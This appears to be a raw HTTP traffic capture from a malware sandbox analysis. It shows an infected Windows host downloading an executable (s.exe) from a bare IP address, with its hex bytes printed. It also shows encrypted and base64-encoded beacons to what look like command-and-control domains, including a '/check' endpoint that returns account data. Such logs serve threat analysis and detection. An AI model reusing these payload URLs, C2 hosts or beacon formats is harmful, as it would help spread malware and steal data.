                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:38 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aZKHvJvCVDCzxhjWf5J7Z9xbZ3ssVz0tZAOE%2BAhaTk6DEEA82yxzyjC%2BpHWjq0J0nQOyRFRkwLq6FGHh2WrIAX2GwKoR5X8WIXpKW6u5q3U8EWmHbSz46SbVBrXwl6b1Xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e92d8406d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc d0 33 a4 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 15 3d 33 d1 8c 77 45 7c 1f 57 44 d5 2d 97 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed e5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 af 87 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 15 16 a9 a0 91 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 75 74 bf 76 34 fd f8 92 3d 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb a0 b2 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 33 d4 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 58 94 fc 9d 7f 3f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 65 f2 df 8e 82 e1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 04 99 85 1f d4 dc 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 72 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c 78 66 e3 52 48 e4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 0d c3 fd d4 5f 59 6a 43 9c 39 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3
                                                                                                                                  Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j3S5sj=3wE|WD-<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{/autv4=Sl}~qJO;yLuVW;*r#kI3r;Lc1<'i3FH4IhX?[@Wd{9f(B@w=fd3Ts%pKe^NTUo)2([^TuWz),^[};5-mCXri+z(FzkG0xfRH)M?~Mpvn%N_YjC94b>@3%}
                                                                                                                                  Oct 17, 2022 22:06:42.842374086 CEST5577OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pdviimuy.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 349
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:42.952801943 CEST5579INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:42 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vkHqKg5vyXTimHZFe9tYdqMPuqfUY%2Fpg1rG8PBkOrVnw1Y9bIBgDBAnzaPSgrCYUG86718Mr4lfZNwg7zuRNN9zxFXE3QXVUSwcrxLhwLa6eNaKlXUkXtWzrwHPHWFgLog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba805de2806d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  16192.168.2.549693185.174.137.17480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:06:30.526719093 CEST1072OUTGET /s.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: 185.174.137.174
                                                                                                                                  Oct 17, 2022 22:06:30.566370964 CEST1073INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 19:59:09 GMT
                                                                                                                                  ETag: "36200-5eb4068a369dc"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 221696
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 51 4b 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 58 17 00 00 00 00 00 06 a1 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 19 00 00 04 00 00 3c 0b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f3 01 00 28 00 00 00 00 e0 18 00 d8 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 ef 01 00 00 10 00 00 00 f0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 dc 16 00 00 00 02 00 00 22 01 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 4b 00 00 00 e0 18 00 00 4c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Tv:%:%:%%:%%:%A%:%;%:%%:%%:%%:%Rich:%PEL:QKaX@0<|(K09@.text `.data@"@.rsrcKL@@
                                                                                                                                  Oct 17, 2022 22:06:30.566414118 CEST1075INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f5 01 00 d0 f5 01 00 e0 f5 01 00 f8 f5 01 00 0c f6 01 00 20 f6 01 00 2e f6 01 00 46 f6 01 00 60 f6 01 00
                                                                                                                                  Data Ascii: .F`r 6H`nz$>JVfx.BVl
                                                                                                                                  Oct 17, 2022 22:06:30.566440105 CEST1076INData Raw: 71 81 40 00 16 81 40 00 bb 80 40 00 63 80 40 00 0b 80 40 00 89 77 40 00 66 61 6c 73 65 00 00 00 74 72 75 65 00 00 00 00 9c 3e 40 00 3e 69 40 00 08 3f 40 00 e1 68 40 00 c3 68 40 00 c7 68 40 00 50 71 40 00 6a 71 40 00 84 71 40 00 54 3f 40 00 08 6c
                                                                                                                                  Data Ascii: q@@@c@@w@falsetrue>@>i@?@h@h@h@Pq@jq@q@T?@l@l@?@@l@l@?@=o@l@<@@p@l@vector<T> too longbad castios_base::eofbit setios_base::failbit setios_base::badbit seteEldlu
                                                                                                                                  Oct 17, 2022 22:06:30.566468954 CEST1077INData Raw: 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00
                                                                                                                                  Data Ascii: h(((( H
                                                                                                                                  Oct 17, 2022 22:06:30.566495895 CEST1079INData Raw: fc fd fe ff 4c 43 5f 54 49 4d 45 00 4c 43 5f 4e 55 4d 45 52 49 43 00 00 4c 43 5f 4d 4f 4e 45 54 41 52 59 00 4c 43 5f 43 54 59 50 45 00 00 00 00 4c 43 5f 43 4f 4c 4c 41 54 45 00 00 4c 43 5f 41 4c 4c 00 00 20 1f 40 00 00 00 00 00 11 3e 41 00 14 1f
                                                                                                                                  Data Ascii: LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALL @>A@C>A@CL@@CK;A@C8A@C58A !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg
                                                                                                                                  Oct 17, 2022 22:06:30.566524029 CEST1080INData Raw: 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e 61 62 6c 65 20 74 6f 20 69 6e 69 74 69 61 6c 69 7a 65 20 68 65 61 70 0d 0a 00 00 00 00 52 36 30 32 37 0d 0a 2d
                                                                                                                                  Data Ascii: R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtual function callR6024- not enou
                                                                                                                                  Oct 17, 2022 22:06:30.566550016 CEST1081INData Raw: 74 61 74 65 73 00 00 00 75 6e 69 74 65 64 2d 6b 69 6e 67 64 6f 6d 00 00 74 72 69 6e 69 64 61 64 20 26 20 74 6f 62 61 67 6f 00 00 00 73 6f 75 74 68 2d 6b 6f 72 65 61 00 73 6f 75 74 68 2d 61 66 72 69 63 61 00 00 00 00 73 6f 75 74 68 20 6b 6f 72 65
                                                                                                                                  Data Ascii: tatesunited-kingdomtrinidad & tobagosouth-koreasouth-africasouth koreasouth africaslovakpuerto-ricopr-chinapr chinanznew-zealandhong-konghollandgreat britainenglandczechchinabritainamericausaus
                                                                                                                                  Oct 17, 2022 22:06:30.566576004 CEST1082INData Raw: 55 00 d0 2d 40 00 45 4e 55 00 bc 2d 40 00 45 4e 55 00 b0 2d 40 00 45 4e 41 00 a8 2d 40 00 4e 4c 42 00 9c 2d 40 00 45 4e 43 00 98 2d 40 00 5a 48 48 00 94 2d 40 00 5a 48 49 00 8c 2d 40 00 43 48 53 00 78 2d 40 00 5a 48 48 00 64 2d 40 00 43 48 53 00
                                                                                                                                  Data Ascii: U-@ENU-@ENU-@ENA-@NLB-@ENC-@ZHH-@ZHI-@CHSx-@ZHHd-@CHSP-@ZHI<-@CHT,-@NLB-@ENU-@ENA,@ENL,@ENC,@ENB,@ENI,@ENJ,@ENZ,@ENS,@ENTt,@ENGh,@ENU\,@ENUL,@FRB<,@FRC(,@FRL,@FRS
                                                                                                                                  Oct 17, 2022 22:06:30.566602945 CEST1084INData Raw: 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f 6d 6e 69 20 63 61 6c 6c 73 69 67 27 00 00 20 64 65 6c 65 74 65 5b 5d 00 00 00 20 6e 65 77 5b 5d 00 00 60 6c 6f 63 61 6c 20 76 66 74 61 62 6c 65
                                                                                                                                  Data Ascii: `placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RTTI`EH`udt returning'`copy constructor closure'`eh vector vbase constructor iterator'`eh vector destructor itera
                                                                                                                                  Oct 17, 2022 22:06:30.566629887 CEST1085INData Raw: 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00
                                                                                                                                  Data Ascii: EEE00P('8PW700PP (`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32.DLLSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugS
                                                                                                                                  Oct 17, 2022 22:06:30.606272936 CEST1087INData Raw: 0c 3d 40 00 34 3d 40 00 cc 3c 40 00 f0 3b 40 00 48 3c 40 00 64 3c 40 00 50 3d 40 00 f0 3b 40 00 48 3c 40 00 64 3c 40 00 00 00 00 00 70 0a 43 00 08 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 fc 3c 40 00 c0 09 43 00 03 00 00 00 08 00
                                                                                                                                  Data Ascii: =@4=@<@;@H<@d<@P=@;@H<@d<@pC@<@C@;@C=@=@=@:@:@C@=@C=@=@=@C


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  17192.168.2.54970245.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:05.927108049 CEST5771OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:06.081849098 CEST5771INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:06 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 53 54 46 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 74 46 4d 6c 46 73 5a 46 52 54 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6d 70 56 4d 30 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 70 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qSTFMQ0p5WVc1a1gzTjBjaUk2SWtFMlFsZFRTZXlKemFXUWlPall6TmpVM0xDSjBhVzFsSWpveE5qWTJpSjk=0
                                                                                                                                  Oct 17, 2022 22:07:06.666146994 CEST5772OUTPOST /check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:06.666268110 CEST5772OUTData Raw: 57 56 64 57 62 46 70 58 56 6d 78 61 56 31 5a 73 53 57 70 76 5a 30 6c 71 52 54 42 68 62 55 5a 77 59 6e 6c 4a 63 30 6c 44 53 6e 52 5a 56 30 31 70 54 32 6c 42 61 56 70 58 52 6d 74 4f 56 31 4a 70 54 30 52 53 61 30 31 58 55 6d 70 4f 61 6c 70 74 54 57
                                                                                                                                  Data Ascii: WVdWbFpXVmxaV1ZsSWpvZ0lqRTBhbUZwYnlJc0lDSnRZV01pT2lBaVpXRmtOV1JpT0RSa01XUmpOalptTWpZNE5qazRZamM0Wm1ReE5HSTFNRGdpTENBaWNHRjVTVzVtYnlJNklHWmhiSE5sTENBaWRXbGtJam9nSWpFeE1UTWlMQ0FpZFc1ZmNIZGtJam9nSWV5SmhZMk52ZFc1MFNXUWlPaUFpSWl3Z0ltTnZZMjlrWlNJNkl
                                                                                                                                  Oct 17, 2022 22:07:06.850296974 CEST5773INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:06 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 35 22 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 31{"status":2,"ip":"102.129.143.15","accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  18192.168.2.54970534.91.216.4980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:11.143611908 CEST5901OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xqxsaedljj.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 294
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.143630028 CEST5902OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d3 66 97 02 1f d3 27 f2 fe 75 a4 6d 09 30
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f'um0}fXw{EQsj|)M!;!$jqq5zED}c1.dFeO1CH|g52+(%D>6Ew(xRVX*.4f}|s ppf
                                                                                                                                  Oct 17, 2022 22:07:11.258194923 CEST5903INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  transfer-encoding: chunked
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 32 42 34 33 0d 0a 53 00 00 00 8f 3b 45 34 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 